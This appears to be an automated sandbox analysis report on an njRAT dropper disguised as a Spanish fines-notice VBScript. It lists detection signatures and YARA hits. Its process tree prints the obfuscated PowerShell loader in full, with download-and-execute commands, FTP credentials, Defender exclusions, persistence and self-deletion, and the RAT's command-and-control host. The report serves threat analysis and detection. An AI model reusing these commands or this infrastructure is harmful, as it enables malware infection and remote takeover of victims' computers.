Edit tour

Windows Analysis Report
Oficio notificacion multas y sanciones.vbs

Overview

General Information

Sample name:	Oficio notificacion multas y sanciones.vbs
Analysis ID:	1517277
MD5:	5d0e059a9d852fbaa853170862b948f7
SHA1:	89c0faf4ba6531b3e9c5550f53280e02492c770d
SHA256:	838e276f65a1dcdf9fd0292c3c7cd8b6c3f6c2ed940adcc663d68dd84a40e2c4
Tags:	njratRATvbsuser-abuse_ch
Infos:

Detection

Njrat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Copy file to startup via Powershell

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected AntiVM3

Yara detected Njrat

Yara detected Powershell download and execute

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Self deletion via cmd or bat file

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Uses dynamic DNS services

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Script Run in AppData

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 4956 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 2748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c???BK???Dg???Nw???1???DE???MgBv???HI???c???By???GU???c???Bv???Gw???ZQB2???GU???Z??????n???Cw???KQ???p???Dk???N??????s???DY???MQ???x???Cw???Nw???5???Cw???N??????x???DE???L??????4???Dk???L??????4???DE???MQ???s???Dc???M??????x???Cw???OQ???5???Cw???NQ???x???DE???L??????x???D??????MQ???s???D??????M??????x???Cg???XQBd???Fs???cgBh???Gg???YwBb???C??????bgBp???G8???ag???t???Cg???K???Bs???GE???aQB0???G4???ZQBk???GU???cgBD???Gs???cgBv???Hc???d???Bl???E4???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???C??????d???Bj???GU???agBi???G8???LQB3???GU???bg???g???D0???I???Bz???Gw???YQBp???HQ???bgBl???GQ???ZQBy???EM???LgB6???HQ???e???Bo???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???OwBn???FM???egBD???EI???b??????k???Ds???Mg???x???HM???b???BU???Do???OgBd???GU???c???B5???FQ???b???Bv???GM???bwB0???G8???cgBQ???Hk???d???Bp???HI???dQBj???GU???Uw???u???HQ???ZQBO???C4???bQBl???HQ???cwB5???FM???Ww???g???D0???I???Bs???G8???YwBv???HQ???bwBy???F??????eQB0???Gk???cgB1???GM???ZQBT???Do???OgBd???HI???ZQBn???GE???bgBh???E0???d???Bu???Gk???bwBQ???GU???YwBp???HY???cgBl???FM???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???Fs???OwB9???GU???dQBy???HQ???J???B7???C??????PQ???g???Gs???YwBh???GI???b???Bs???GE???QwBu???G8???aQB0???GE???Z???Bp???Gw???YQBW???GU???d???Bh???GM???aQBm???Gk???d???By???GU???QwBy???GU???dgBy???GU???Uw???6???Do???XQBy???GU???ZwBh???G4???YQBN???HQ???bgBp???G8???U???Bl???GM???aQB2???HI???ZQBT???C4???d???Bl???E4???LgBt???GU???d???Bz???Hk???UwBb???Hs???I???Bl???HM???b???Bl???H0???I???Bm???C8???I??????w???C??????d??????v???C??????cg???v???C??????ZQB4???GU???LgBu???Hc???bwBk???HQ???dQBo???HM???I??????7???Cc???M??????4???DE???I???Bw???GU???ZQBs???HM???Jw???g???GQ???bgBh???G0???bQBv???GM???LQ???g???GU???e???Bl???C4???b???Bs???GU???a???Bz???HI???ZQB3???G8???c??????7???C??????ZQBj???HI???bwBm???C0???I??????p???C??????JwBw???HU???d???By???GE???d???BT???Fw???cwBt???GE???cgBn???G8???cgBQ???Fw???dQBu???GU???TQ???g???HQ???cgBh???HQ???UwBc???HM???dwBv???GQ???bgBp???Fc???X???B0???GY???bwBz???G8???cgBj???Gk???TQBc???Gc???bgBp???G0???YQBv???FI???X???Bh???HQ???YQBE???H??????c???BB???Fw???Jw???g???Cs???I???Ba???Es???bgBZ???E0???J??????g???Cg???I???Bu???G8???aQB0???GE???bgBp???HQ???cwBl???EQ???LQ???g???Cc???JQBJ???Gg???cQBS???Fg???JQ???n???C??????bQBl???HQ???SQ???t???Hk???c???Bv???EM???I??????7???C??????d???By???GE???d???Bz???GU???cgBv???G4???Lw???g???HQ???ZQBp???HU???cQ???v???C??????RwBj???Fc???aQBS???C??????ZQB4???GU???LgBh???HM???dQB3???C??????ZQB4???GU???LgBs???Gw???ZQBo???HM???cgBl???Hc???bwBw???C??????Ow???p???Cc???dQBz???G0???LgBu???Gk???dwBw???FU???X??????n???C??????Kw???g???E4???SgBU???Hg???R??????k???Cg???I??????9???C??????RwBj???Fc???aQBS???Ds???KQ???g???GU???bQBh???E4???cgBl???HM???VQ???6???Do???XQB0???G4???ZQBt???G4???bwBy???Gk???dgBu???EU???Ww???g???Cs???I??????n???Fw???cwBy???GU???cwBV???Fw???OgBD???Cc???K??????g???D0???I???Ba???Es???bgBZ???E0???J??????7???Ck???JwB1???HM???bQ???u???G4???aQB3???H??????VQBc???Cc???I??????r???C??????TgBK???FQ???e???BE???CQ???I??????s???EI???SwBM???FI???VQ???k???Cg???ZQBs???Gk???RgBk???GE???bwBs???G4???dwBv???EQ???LgBu???Eo???eQBW???Go???J??????7???Dg???RgBU???FU???Og???6???F0???ZwBu???Gk???Z???Bv???GM???bgBF???C4???d???B4???GU???V??????u???G0???ZQB0???HM???eQBT???Fs???I??????9???C??????ZwBu???Gk???Z???Bv???GM???bgBF???C4???bgBK???Hk???VgBq???CQ???Ow???p???HQ???bgBl???Gk???b???BD???GI???ZQBX???C4???d???Bl???E4???I???B0???GM???ZQBq???GI???Tw???t???Hc???ZQBO???Cg???I??????9???C??????bgBK???Hk???VgBq???CQ???OwB9???Ds???I??????p???Cc???d???BP???Ew???YwBf???Es???YQ???z???Fo???ZgBv???Fg???MgBK???Eo???cgBW???Gg???bQBW???Dk???YwBt???Dk???W???Bz???HU???W???Bt???Go???MQBn???DE???Jw???g???Cs???I???Bv???Hg???SwBV???Gc???J??????o???C??????PQ???g???G8???e???BL???FU???Zw???k???Hs???I???Bl???HM???b???Bl???H0???Ow???g???Ck???Jw???y???DQ???dQBY???Eo???V???Bx???GE???bQBn???Hk???TQB0???EY???egBh???Gs???U???BS???DE???cQBf???Ek???dgBH???Gk???W???BO???GQ???cQBh???E4???MQ???n???C??????Kw???g???G8???e???BL???FU???Zw???k???CgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBV???GcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABQAGIAbgBFAFoAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABQAGIAbgBFAFoAJAAgADsA';$kahlN = $qKKzc.replace('???' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs');powershell $vQpeD MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6524 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6388 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 3116 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 4836 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 5436 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 5792 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

RegAsm.exe (PID: 7212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 8148 cmdline: cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5552 cmdline: cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7368 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7428 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 7612 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7656 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7788 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
NjRAT	RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.	AQUATIC PANDA Earth Lusca Operation C-Major The Gorgon Group	http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ http://blogs.360.cn/post/analysis-of-apt-c-37.html http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://asec.ahnlab.com/1369	https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Malware Configuration

Threatname: Njrat

{"Host": "notificadoresrma.duckdns.org", "Port": "2054", "Campaign ID": "NYAN CAT", "Network Seprator": "@!#&^%$", "Registry": "a388ab2ca3be4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 2748	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2748	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x970:$b2: ::FromBase64String( 0xb79:$b2: ::FromBase64String( 0x3cd4:$b2: ::FromBase64String( 0x5d2f:$b2: ::FromBase64String( 0x1d112:$b2: ::FromBase64String( 0x1d27c:$b2: ::FromBase64String( 0x1e766:$b2: ::FromBase64String( 0x1e92f:$b2: ::FromBase64String( 0x1f681:$b2: ::FromBase64String( 0x1f857:$b2: ::FromBase64String( 0x50e5d:$b2: ::FromBase64String( 0x50fc7:$b2: ::FromBase64String( 0x535a2:$b2: ::FromBase64String( 0x76a2d:$b2: ::FromBase64String( 0x78a88:$b2: ::FromBase64String( 0x7b428:$b2: ::FromBase64String( 0x7d483:$b2: ::FromBase64String( 0xac3b0:$b2: ::FromBase64String( 0xafe1e:$b2: ::FromBase64String( 0xb057a:$b2: ::FromBase64String( 0xb0c10:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 1088	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: powershell.exe PID: 1088	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1088	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x63df:$b2: ::FromBase64String( 0x6d29:$b2: ::FromBase64String( 0x3c706:$b2: ::FromBase64String( 0x3e6cf:$b2: ::FromBase64String( 0x41c63:$b2: ::FromBase64String( 0x67078:$b2: ::FromBase64String( 0x67651:$b2: ::FromBase64String( 0xacc0e:$b2: ::FromBase64String( 0xacc7d:$b2: ::FromBase64String( 0xaf175:$b2: ::FromBase64String( 0xaf1e4:$b2: ::FromBase64String( 0xbefe3:$b2: ::FromBase64String( 0xd8afe:$b2: ::FromBase64String( 0xd930a:$b2: ::FromBase64String( 0x1bcb73:$b2: ::FromBase64String( 0x1bd3a4:$b2: ::FromBase64String( 0x1c45ee:$b2: ::FromBase64String( 0x1c4dfa:$b2: ::FromBase64String( 0x239046:$b2: ::FromBase64String( 0x23c32b:$b2: ::FromBase64String( 0x23c39a:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 6388	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 5792	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: powershell.exe PID: 5792	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3d81b:$b2: ::FromBase64String( 0x40dce:$b2: ::FromBase64String( 0x45408:$b2: ::FromBase64String( 0x835d9:$b2: ::FromBase64String( 0x8ba12:$b2: ::FromBase64String( 0x56c81:$s1: -join 0x644d2:$s1: -join 0x78abc:$s3: reverse 0x78dc5:$s3: reverse 0x796a0:$s3: reverse 0x79aba:$s3: reverse 0x912b8:$s3: reverse 0x9c87f:$s3: reverse 0xa4d73:$s3: reverse 0xa599b:$s3: reverse 0x4fe84:$s4: += 0x4fea3:$s4: += 0x4fede:$s4: += 0x4fefb:$s4: += 0x4ff36:$s4: += 0x4ffa2:$s4: +=
Process Memory Space: RegAsm.exe PID: 7212	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: powershell.exe PID: 7428	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: powershell.exe PID: 7428	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x97e17:$b2: ::FromBase64String( 0x9b3b7:$b2: ::FromBase64String( 0x104c4d:$b2: ::FromBase64String( 0x123feb:$b2: ::FromBase64String( 0x13ae36:$b2: ::FromBase64String( 0x1691e5:$b2: ::FromBase64String( 0x1108c6:$s1: -join 0x116f8c:$s1: -join 0xc49:$s3: reverse 0x78cb:$s3: reverse 0x9773:$s3: reverse 0x147a2:$s3: reverse 0x56c3e:$s3: reverse 0x56f2c:$s3: reverse 0x57646:$s3: reverse 0x57dff:$s3: reverse 0x5ed5b:$s3: reverse 0x5f175:$s3: reverse 0x5fcfd:$s3: reverse 0x609aa:$s3: reverse 0xe225e:$s3: reverse
Process Memory Space: RegAsm.exe PID: 7544	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: powershell.exe PID: 7656	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: powershell.exe PID: 7656	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xddd5d:$b2: ::FromBase64String( 0xf5c98:$b2: ::FromBase64String( 0x115335:$b2: ::FromBase64String( 0x129340:$b2: ::FromBase64String( 0x7465e:$s1: -join 0x7b50f:$s1: -join 0x8b9d5:$s3: reverse 0x970f6:$s3: reverse 0xf6848:$s3: reverse 0xf6b36:$s3: reverse 0xf7250:$s3: reverse 0xf7a09:$s3: reverse 0xfe947:$s3: reverse 0xfed61:$s3: reverse 0xff8e9:$s3: reverse 0x100596:$s3: reverse 0x12d307:$s3: reverse 0x133f89:$s3: reverse 0x135e1c:$s3: reverse 0x140e4b:$s3: reverse 0x147631:$s3: reverse
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author
23.2.powershell.exe.20958f44b38.1.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
